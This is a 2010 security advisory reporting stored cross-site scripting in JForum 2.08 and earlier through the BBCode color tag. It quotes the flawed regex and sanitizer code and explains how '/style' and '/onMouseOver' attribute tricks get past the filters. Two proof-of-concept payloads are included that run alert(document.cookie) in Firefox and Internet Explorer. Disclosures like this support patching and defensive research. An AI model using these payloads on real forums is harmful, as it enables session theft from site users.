JForum 2.08 Cross Site Scripting

Type packetstorm
Reporter Giorgio Fedon
Modified 2010-08-13T00:00:00


                                            `Minded Security Labs: Advisory #MSA130510  
JForum <= 2.08 is vulnerable to Stored Cross Site Scripting in BBCode.  
Tested Versions:   
JForum v. 2.08  
Minded Security ReferenceID:  
Discovery by   
Giorgio Fedon of Minded Security  
giorgio.fedon [_at_] mindedsecurity.com  
Disable color bbtag  
Minded Security Consultants discovered during a penetration testing activity that   
JForum <= 2.08 is vulnerable to Stored Cross Site Scripting.  
BBcode configurations are loaded from "bb_config.xml" that contains  
configurations for bbcode to HTML conversion.  
JForum/src/net/jforum/util/bbcode/BBCodeHandler.java (lines 76 to 87)  
public BBCodeHandler() { } public BBCodeHandler parse() { try { SAXParser parser = SAXParserFactory.newInstance().newSAXParser(); BBCodeHandler bbParser = new BBCodeHandler(); String path = SystemGlobals.getValue(ConfigKeys.CONFIG_DIR) + "/bb_config.xml"; ...   
Tag "[color=red]Text[/color]" is handled by the following lines of code:  
<!-- COLOR --> <match name="color" removeQuotes="true"> <regex>(?s)(?i)\[color=['"]?(.*?[^'"])['"]?\](.*?)\[/color\]</regex> <replace> <![CDATA[ <font color='$1'>$2</font> ]]> </replace> </match>   
As it's possible to see from the previous code, "color" attribute  
expects a parameter between single quotes. Jforum does not encode single  
quotes, so it's possible to add arbitrary attributes.  
Before launching the attacks it's important to investigate other defense  
in depth measures inside Jforum. These controls are handled by:  
By analizing this class it's possible to see that characters "<", ">"  
and " \" " are converted into HTML entities:  
if (text.indexOf('>') > -1 || text.indexOf('<') > -1) { StringBuffer tmp = new StringBuffer(text); ViewCommon.replaceAll(tmp, "<", "<"); ViewCommon.replaceAll(tmp, ">", ">"); ViewCommon.replaceAll(tmp, "\"", """); node.setText(tmp.toString()); } }   
If Decimal or Hex Entities are used, these will be modified to not allow  
auto decoding and javascript execution:  
if (a.getValue().indexOf("&#") > -1) { a.setValue(a.getValue().replaceAll("&#", "&#"));   
If "Style" attribute contains a parenthesis this will lead to clearing  
the attribute content:  
else if ("STYLE".equals(name)) { // It is much more a try to not allow constructions // like style="background-color: url(javascript:xxxx)" than anything else if (value.indexOf('(') > -1) { return false; } }   
From the code above an exact match against the attribute vector is  
performed. If the attribute equals to "style" the sanitization step  
takes place; unfortunately "/style" is still a valid attribute and  
allows to bypass the exact match.  
The same technique can be used to evade Jforum blacklist restrictions  
for event handlers (es. onMouseOver, onMouseOut, etc.).  
---- Proof Of Concept  
Stored XSS - proof of concept for Firefox ("onMouseOver" is blacklisted):  
[color=red' style='top:0px;left:0px;position:absolute;font-size:500;opacity:0' /onMouseOver='alert(document.cookie)']XSS4FF[/color]   
Renders into the following HTML code:  
<font color='red' style='top:0px;left:0px;position:absolute;font-size:500;opacity:0' /onMouseOver='alert(document.cookie)'>XSS4FF</font>   
Stored XSS - proof of concept for Internet Explorer ("style" cannot contain  
parenthesis "(" ):  
[color=red' /style='color:expression(alert(document.cookie))']XSS4IE[/color]   
Renders into the following HTML code:  
<font color='red' /style='color:expression(alert(document.cookie))'>XSS4IE</font>   
Disclosure Timeline  
14-02-2010 Issue Discovered  
25-02-2010 Reported to Vendor  
13-05-2010 Public Disclosure  
The information within this paper may change without notice. Use  
of this information constitutes acceptance for use in an AS IS  
condition. There are NO warranties with regard to this information.  
In no event shall the author be liable for any damages whatsoever   
arising out of or in connection with the use or spread of this   
Any use of this information is at the user's own risk.  
Permission is hereby granted for the redistribution of this Alert  
electronically. It is not to be edited in any way without express  
consent of Minded Security Research Lab. If you wish to reprint the  
whole or any part of this Alert in any other medium excluding  
electronic medium, please e-mail research_at_mindedsecurity.com   
for permission.  
Copyright (c) 2010 Minded Security, S.r.l..  
All rights reserved worldwide.